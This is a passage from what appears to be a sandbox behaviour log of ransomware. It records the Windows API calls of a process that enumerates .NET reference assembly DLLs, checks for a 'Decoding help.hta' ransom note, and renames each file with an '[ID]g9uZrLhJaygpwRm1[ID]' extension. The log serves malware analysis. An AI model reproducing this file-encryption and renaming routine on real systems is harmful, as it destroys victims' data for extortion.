Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.669] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa96ee048, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa96ee048, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa96ee048, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x78000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ServiceModel.Web.dll", cAlternateFileName="")) returned 1 [0056.669] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.669] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.669] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.670] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.ServiceModel.Web.dll") returned -1 [0056.670] lstrlenW (lpString="System.ServiceModel.Web.dll") returned 27 [0056.670] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.670] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.ServiceModel.Web.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" [0056.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" [0056.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.670] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.670] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae496e97, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xae496e97, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae496e97, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Abstractions.dll", cAlternateFileName="")) returned 1 [0056.670] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.670] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.670] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Abstractions.dll") returned -1 [0056.670] lstrlenW (lpString="System.Web.Abstractions.dll") returned 27 [0056.670] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.670] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Abstractions.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" [0056.671] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" [0056.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.672] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe34b90, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xabe34b90, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xabf193d2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.DynamicData.Design.dll", cAlternateFileName="")) returned 1 [0056.674] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.674] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.674] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.674] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.674] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.DynamicData.Design.dll") returned -1 [0056.674] lstrlenW (lpString="System.Web.DynamicData.Design.dll") returned 33 [0056.674] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.674] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.674] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.674] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.DynamicData.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" [0056.674] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" [0056.674] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.675] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1ecdf7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xac1ecdf7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xac3b5e7a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.DynamicData.dll", cAlternateFileName="")) returned 1 [0056.675] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.675] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.675] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.675] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.DynamicData.dll") returned -1 [0056.675] lstrlenW (lpString="System.Web.DynamicData.dll") returned 26 [0056.675] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.675] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.675] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.675] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.DynamicData.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" [0056.675] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" [0056.675] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.675] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacc30cea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xacc30cea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xacd3b68c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Entity.Design.dll", cAlternateFileName="")) returned 1 [0056.675] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.675] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.675] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.676] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Entity.Design.dll") returned -1 [0056.676] lstrlenW (lpString="System.Web.Entity.Design.dll") returned 28 [0056.676] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.676] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.676] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.676] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" [0056.676] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" [0056.676] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.676] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5edaf9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xae5edaf9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae71e5fc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Entity.dll", cAlternateFileName="")) returned 1 [0056.676] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.676] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.676] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.676] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Entity.dll") returned -1 [0056.676] lstrlenW (lpString="System.Web.Entity.dll") returned 21 [0056.676] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.676] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.676] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" [0056.676] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" [0056.676] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.479] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadaeb525, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xadaeb525, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xadb11685, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x52000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Extensions.Design.dll", cAlternateFileName="")) returned 1 [0057.479] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0057.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.479] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference 